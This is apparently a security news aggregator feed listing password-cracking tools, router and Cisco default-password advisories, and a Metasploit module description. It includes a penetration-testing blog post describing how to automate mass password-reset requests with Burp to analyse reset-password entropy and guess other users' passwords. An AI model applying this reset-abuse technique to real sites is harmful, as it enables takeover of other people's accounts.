John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
10:09
»
Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
10:09
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
18:42
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
16:56
»
Packet Storm Security Exploits
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
16:56
»
Packet Storm Security Recent Files
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
16:56
»
Packet Storm Security Misc. Files
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
-
9:44
»
Packet Storm Security Recent Files
This article will show how to use Hydra to check for weak passwords. Hydra tries all possible password combination against a server on the Internet until one valid one is found to log in to the server. It is a powerful tool for hackers and network administrators alike.
-
9:44
»
Packet Storm Security Misc. Files
This article will show how to use Hydra to check for weak passwords. Hydra tries all possible password combination against a server on the Internet until one valid one is found to log in to the server. It is a powerful tool for hackers and network administrators alike.
-
-
22:56
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
22:56
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
15:00
»
Sophos security news
Sophos launches free mobile security toolkit as survey reveals lack of consumer concern regarding security issues on mobile devices
-
-
17:04
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
17:04
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:32
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
8:32
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
5:04
»
Carnal0wnage
Dave Ferguson has beaten up on forgotten/reset password functionality for some time and recently participated in an OWASP podcast where he discussed these problems. The podcast reminded me of some techniques I've used in the past which have been successful and may be worth sharing. Accessing other user's accounts with insecurely coded forgot/reset password functionality is more common than you might think.
This posts focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing thru all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.
For those not familiar with BurpSuite's Macro support, lets walk thru this.
So here is a picture of the email reset we've been sent:
To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.
Take a look at the screenshot below:
Okay now we need to configure each individual request/response to extract data we want. We have to grab a JSESSIONID and a struts token. Lets highlight the first request/response and configure.
Example of configuring one of the items
You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.
Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.
Name the Macro
The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.
Next, you'll need to add the pages to scope:
Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.
Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:
Lines 11-17: Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj
Lines 20-27: Line 21-22: If we no emails, print that fact out to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.
Lines 31-36: Line 31: Iterate thru pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method
Lines 40-53: Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches the "password: somepassword" write it to a file.
Line 53: Kick the whole thing off
Review the tokens.txt file
 |
| We can see that the new passwords sent aren't very random. We can load this in burp sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this and yes this is a real-life example that I've come across: |
Factors that could slow us down:
1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and and the site tells you it doesn't exist. Now we know who
DOES exist on the system.
2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).
3) After we've reset other user's passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small amount of incorrect password submissions) the account may be locked out leaving us without access. That is no fun.
Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.
Here is an example of loading the tokens file in sequencer:
Summary:
We've bypassed struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy but we can also do this with sequencer. Now we have a way to guess passwords more efficiently and in combination with other flaws leaves us just a short period of time from compromising accounts.
~cktricky
-
-
11:51
»
Packet Storm Security Exploits
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenticated and doesn't remove or block after first access.
-
11:51
»
Packet Storm Security Recent Files
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenticated and doesn't remove or block after first access.
-
11:51
»
Packet Storm Security Misc. Files
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenticated and doesn't remove or block after first access.
-
-
2:05
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
2:05
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:46
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
8:46
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
13:22
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
13:22
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
11:48
»
Packet Storm Security Advisories
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
11:48
»
Packet Storm Security Recent Files
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
11:48
»
Packet Storm Security Misc. Files
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
10:01
»
Hack a Day
The power that a Graphics Processing Unit presents can be harnessed to do some dirty work when trying to crack passwords. [Vijay] took a look at some of the options out there for cracking passwords and found that utilizing the GPU produces the correct password in a fraction of the time. On a Windows machine [...]
-
-
23:09
»
SecuriTeam
Cisco Secure ACS contains an Unauthorized Password Change Vulnerability.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
20:51
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
20:51
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
20:38
»
Packet Storm Security Recent Files
PACK (Password Analysis and Cracking Kit) is a toolkit that allows researchers to optimize their password cracking tasks, analyze previously cracked passwords, and implements a novel attack on corporate passwords using minimum password policy. The goal of this toolkit is to assist in automatic preparation for the "better than bruteforce" password attacks by analyzing common ways that people create passwords. After the analysis stage, the statistical database can be used to generate attack masks for common tools such as Hashcat, oclHashcat, and others.
-
20:38
»
Packet Storm Security Misc. Files
PACK (Password Analysis and Cracking Kit) is a toolkit that allows researchers to optimize their password cracking tasks, analyze previously cracked passwords, and implements a novel attack on corporate passwords using minimum password policy. The goal of this toolkit is to assist in automatic preparation for the "better than bruteforce" password attacks by analyzing common ways that people create passwords. After the analysis stage, the statistical database can be used to generate attack masks for common tools such as Hashcat, oclHashcat, and others.
-
6:04
»
Hack a Day
shackspace member [@dop3j0e] found himself in a real bind when trying to recover some data after his ThinkPad’s fingerprint scanner died. You see, he stored his hard drive password in the scanner, and over time completely forgot what it was. Once the scanner stopped working, he had no way to get at his data. He [...]
-
-
12:02
»
Hack a Day
In his line of work, Instructables user [Harrymatic] sees a lot of Toshiba laptops come across his desk, some of which are protected with a BIOS password. Typically, in order to make it past the BIOS lockout and get access to the computer, he would have to open the laptop case and short the CMOS [...]
-
-
15:00
»
Hack a Day
Here’s a guide for recovering protection passwords from ATA hard drives (translated). These passwords are stored in a special area of the hard disk that also contains the firmware for the device. Normally you can’t get at them but [Supersonic] walks us through a method used to grab the data off of a Western Digital [...]
-
-
11:22
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
11:22
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
20:49
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
20:49
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
23:24
»
Packet Storm Security Advisories
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
-
23:24
»
Packet Storm Security Recent Files
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
-
23:24
»
Packet Storm Security Misc. Files
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
0day.today (was: 1337day, Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Penetration Testing
BackTrack Linux Forums
Threatpost
SecDocs
carnal0wnage.attackresearch.com
Darknet
The Exploitant
Wirevolution
